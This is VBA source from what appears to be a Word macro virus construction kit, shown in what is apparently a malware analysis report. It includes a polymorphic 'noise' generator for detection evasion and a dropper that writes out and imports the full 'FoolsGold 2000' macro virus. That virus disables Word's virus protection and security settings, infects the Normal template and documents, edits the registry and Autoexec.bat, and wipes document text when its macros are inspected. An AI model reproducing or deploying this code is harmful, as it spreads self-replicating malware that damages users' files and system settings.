Variable6 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 9999)
End Sub
' My Noise Generator
' This Generator Contains Code Taken From "VicodinES Macro.Poppy Construction Kit v1.0d"
' Kewl
Sub MacroNoiseEngine()
Randomize
noisechance = Int(Rnd * 6)
select1 = Int(Rnd * 6)
select2 = Int(Rnd * 6)
select3 = Int(Rnd * 6)
select4 = Int(Rnd * 6)
select5 = Int(Rnd * 6)
select6 = Int(Rnd * 6)
encode1 = Int(Rnd * 9999)
encode2 = Int(Rnd * 9999)
encode3 = Int(Rnd * 9999)
crypt1 = Int(Rnd * 9999)
crypt2 = Int(Rnd * 9999)
crypt3 = Int(Rnd * 9999)
noisevar1$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & encode1 + crypt1
noisevar2$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22)))
noisevar3$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & encode3 + crypt3
noisevar4$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22)))
noisevar5$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & encode2 + crypt2
noisevar6$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & encode3 + crypt1
' CheckBox2.Value Selects Noise
If CheckBox2.Value = True Then
If select1 = 1 Then
Print #1, noisevar1$ + " = " + noisevar2 + " & " + noisevar3 + " & Int(Rnd * " & crypt3 & ")"
End If
If select1 = 2 Then
Print #1, noisevar4$ + " = " + noisevar5 + " & " + noisevar6
End If
If select1 = 3 Then
Print #1, noisevar1$ + " = " + noisevar2 + " & " + noisevar3 + " & Int(Rnd * " & crypt1 & ")"
End If
If select1 = 4 Then
Print #1, noisevar4$ + " = " + noisevar5 + " & " + noisevar6
End If
If select1 = 5 Then
Print #1, noisevar1$ + " = " + noisevar2 + " & " + noisevar3 + " & " + noisevar4 + " & " + noisevar5
End If
If select1 = 6 Then
Print #1, noisevar4$ + " = " + noisevar5 + " & " + noisevar6 + " & " + noisevar2 + " & " + noisevar3
End If
End If
End Sub
Attribute VB_Name = "WMVGAbout"
Attribute VB_Base = "0{E19B3AE8-5287-4688-A582-584F66D7A7EC}{DFEAECAE-5D28-4ED2-B55F-F3EAB00AF858}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
WMVGAbout.Hide
WMVG.Show
End Sub
Private Sub Label2_Click()
WMVGSecretFrm4.Show
End Sub
Private Sub UserForm_Click()
End Sub
Attribute VB_Name = "WMVGExit"
Attribute VB_Base = "0{FB5D81A3-580B-4A05-9C7B-8D9C91CA8092}{3454F95F-5C7E-47D6-A233-538DDF74A9BE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
Oldtimer = Timer
While (Timer < Oldtimer + 3)
Wend
End Sub
Private Sub UserForm_Click()
WMVGExit.Hide
Application.Quit
End Sub
Attribute VB_Name = "WMVGExtras"
Attribute VB_Base = "0{1C5DFE43-17D0-4160-9667-100AE63799A2}{34EB5D5D-707A-4A60-9487-02795945932B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Drop FoolsGold Virus
Private Sub CommandButton1_Click()
On Error Resume Next
' Open source file for construction
Open "C:\My Documents\FoolsGold.bas" For Output As #1
Print #1, "Attribute VB_Name = ""Fool"""
Print #1, ""
Print #1, "Sub AutoOpen()"
Print #1, "'FoolsGold 2000 Virus vWMVG"
Print #1, "'The WaLRuS 09/00"
Print #1, "On Error Resume Next"
Print #1, "Options.ConfirmConversions = False"
Print #1, "Options.VirusProtection = False"
Print #1, "Options.SaveNormalPrompt = False"
Print #1, "CommandBars(""Macro"").Controls(""Security..."").Enabled = False"
Print #1, "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&"
Print #1, "ActiveDocument.ReadOnlyRecommended = False"
Print #1, "If (Second(Now()) > 50) Then System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"", ""RegisteredOwner"") = ""The WaLRuS"""
Print #1, "If Day(Now) = 31 Then Call Payload"
Print #1, "Set Norm = NormalTemplate.VBProject.VBComponents"
Print #1, "Set Doc = ActiveDocument.VBProject.VBComponents"
Print #1, "If Norm.Item(""Fool"").Name <> ""Fool"" Then"
Print #1, "Doc(""Fool"").Export ""c:\Fool.drv"""
Print #1, "Set infect = NormalTemplate.VBProject"
Print #1, "ElseIf Doc.Item(""Fool"").Name <> ""Fool"" Then"
Print #1, "Norm(""Fool"").Export ""c:\Fool.drv"""
Print #1, "Set infect = ActiveDocument.VBProject"
Print #1, "End If"
Print #1, "infect.VBComponents.Import (""c:\Fool.drv"")"
Print #1, "Kill (""c:\Fool.drv"")"
Print #1, "ActiveDocument.Save"
Print #1, "End Sub"
Print #1, ""
Print #1, "Sub HelpAbout()"
Print #1, "On Error Resume Next"
Print #1, "Call Payload"
Print #1, "End Sub"
Print #1, ""
Print #1, "Sub Payload()"
Print #1, "On Error Resume Next"
Print #1, "MsgBox ""FoolsGold 2000 by The WaLRuS "", vbInformation"""
Print #1, "Assistant.Visible = True"
Print #1, "With Assistant.NewBalloon"
Print #1, ".Icon = msoIconAlert"
Print #1, ".Text = ""FoolsGold 2000 Thanks You!"""
Print #1, ".Heading = ""GREETINGS"""
Print #1, "End With"
Print #1, "SetAttr ""C:\Autoexec.bat"", 0"
Print #1, "Open ""C:\Autoexec.bat"" For Append As #1"
Print #1, "Print #1, ""CLS"""
Print #1, "Print #1, ""ECHO ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ·"""
Print #1, "Print #1, ""ECHO º ***************************************** º"""
Print #1, "Print #1, ""ECHO º * FoolsGold 2000 Virus by The WaLRuS * º"""
Print #1, "Print #1, ""ECHO º ***************************************** º"""
Print #1, "Print #1, ""ECHO º The Fools Gold Virus wishes to thank the º"""
Print #1, "Print #1, ""ECHO º user of this computer because you have º"""
Print #1, "Print #1, ""ECHO º helped to spread the good words of peace! º"""
Print #1, "Print #1, ""ECHO º WaLRuS º"""
Print #1, "Print #1, ""ECHO ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ"""
Print #1, "Close #1"
Print #1, "Finish:"
Print #1, "End Sub"
Print #1, ""
Print #1, "Sub ToolsMacro()"
Print #1, "On Error Resume Next"
Print #1, "Call Stealthy"
Print #1, "End Sub"
Print #1, "Sub FileTemplates()"
Print #1, "On Error Resume Next"
Print #1, "Call Stealthy"
Print #1, "End Sub"
Print #1, "Sub ViewVBCode()"
Print #1, "On Error Resume Next"
Print #1, "Call Stealthy"
Print #1, "End Sub"
Print #1, "Sub Stealthy()"
Print #1, "On Error Resume Next"
Print #1, "Selection.WholeStory"
Print #1, "Selection.Delete Unit:=wdCharacter, Count:=1"
Print #1, "ActiveDocument.Save"
Print #1, "Call Payload"
Print #1, "End Sub"
Close #1
' Open document and then infect it, save it and close it
Documents.Add Template:=NormalTemplate.FullName, NewTemplate:=False
ActiveDocument.VBProject.VBComponents.Import ("C:\My Documents\FoolsGold.bas")
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.